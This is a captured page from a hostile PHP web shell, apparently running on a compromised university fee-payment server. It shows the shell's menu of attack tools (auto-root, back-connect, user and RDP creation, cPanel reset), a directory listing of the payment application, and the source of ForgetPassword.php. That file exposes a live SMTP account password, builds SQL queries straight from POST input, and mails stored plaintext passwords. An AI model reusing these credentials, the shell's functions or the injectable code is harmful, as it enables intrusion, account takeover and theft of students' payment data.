Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
temppayment /
pg /
[ HOME SHELL ]
Name
Size
Permission
Action
fees
[ DIR ]
drwxr-xr-x
fees-old
[ DIR ]
drwxr-xr-x
ldaplogin
[ DIR ]
drwxr-xr-x
studentsfee
[ DIR ]
drwxr-xr-x
FailedTRAN.php
4.52
KB
-rw-r--r--
ForgetPassword.php
3.09
KB
-rw-r--r--
GetHandleRES.php
11.12
KB
-rw-r--r--
StatusTRAN.php
4.89
KB
-rw-r--r--
donationmail.php
5.71
KB
-rw-r--r--
giveback.php
10.15
KB
-rw-r--r--
index.html
773
B
-rwxrwxrwx
info.php
33
B
-rw-r--r--
libraryfaq.html
16.56
KB
-rw-r--r--
misp.html
14.15
KB
-rw-r--r--
misptest.html
14.15
KB
-rw-r--r--
pay.php
2.46
KB
-rw-r--r--
paybilldesk.php
2.51
KB
-rw-r--r--
payhdfc.php
11.8
KB
-rw-r--r--
payhdfctest.php
8.42
KB
-rw-r--r--
pma.zip
6.17
MB
-rw-r--r--
policyterms.html
6.67
KB
-rw-r--r--
recounsiliation.php
5.52
KB
-rw-r--r--
studentsfee.tar
15.22
MB
-rw-r--r--
test.php
131
B
-rw-r--r--
vendor.php
10.63
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ForgetPassword.php
<?php include "database.php"; require("classes/class.phpmailer.php"); //$id = $_REQUEST['Id']; //$sql= "Select Name From `user` where email='".$_POST['txtEmail']."' and password='".$_POST['txtPassword']."'" ; //echo $_REQUEST['Id']; $sql = "Select Password From `user` where Email='".$_POST['txtEmail']."' and Mobile=".$_POST['Mobile']; //echo $sql; $result = mysql_query($sql,$db_connection); if($row=mysql_fetch_array($result)) { $to = $_POST['txtEmail']; $subject = "Get your password"; $from = "abhinay@iiitd.ac.in"; $message = "<html> <head> <meta http-equiv='content-type' content='text/html; charset=utf-8' /></head><table width='609' border='0' height='100%' cellpadding='0' cellspacing='0' align='center' style='margin:0; padding-bottom:0'> <tr style='margin:0; padding-bottom:0' bgcolor='#f2f5fc'> <td colspan='3' style='margin:0; padding-bottom:0' align='center'><img src='https://payments.iiitd.edu.in/pg/fees/logo.jpg' style='margin:0; padding-bottom:0'/></td> </tr> <tr> <td width='29' bgcolor='#f2f5fc'> </td> <td style='padding:10px 10px 10px 10px'>Your password is : ".$row['Password']."</td> <td bgcolor='#f2f5fc' width='29'> </td> </tr> <tr bgcolor='#f2f5fc'> <td colspan='3' bgcolor='#f2f5fc' align='center' >System Manager : Mr. Abhinay Saxena | <a href='mailto:abhinay@iiitd.ac.in' target='_blank'>abhinay@iiitd.ac.in</a></td> </tr> </table></html>"; $headers = "From: " . $from . "\r\nReply-To: " . $from . ""; $header = "MIME-Version: 1.0\r\n"; $header .= "Content-type: text/html; charset: utf8\r\n"; $headers .= "Return-Path: admin-account@iiitd.ac.in\r\n"; require("./phpmailer/class.phpmailer.php"); require './phpmailer/PHPMailerAutoload.php'; $mail= new phpmailer(); //Enable SMTP debugging. //$mail->SMTPDebug = 3; //Set PHPMailer to use SMTP. $mail->isSMTP(); //Set SMTP host name $mail->Host = "smtp.gmail.com"; //Set this to true if SMTP host requires authentication to send email $mail->SMTPAuth = true; //Provide username and password $mail->Username = "admin-account@iiitd.ac.in"; $mail->Password = "BKWga&2m"; //If SMTP requires TLS encryption then set it $mail->SMTPSecure = "tls"; //Set TCP port to connect to $mail->Port = 587; $mail->From = "admin-account@iiitd.ac.in"; $mail->FromName = "Admin Account"; $mail->addAddress($to,$name); $mail->isHTML(true); $mail->Subject = $subject; $mail->Body = $message; //$mail->AltBody = "This is the plain text version of the email content"; if(!$mail->send()) { echo "Mailer Error: " . $mail->ErrorInfo; } else { echo "Message has been sent to ".$_POST['txtEmail']; } //$sentmail = mail($to,$subject,$message,$header); /*if(!$sentmail) { echo "Mailer Error: " . $mail->ErrorInfo; } else { echo "Message has been sent to ".$_POST['txtEmail']; } */ } else { echo "User with such email does not exists"; } ?>
Close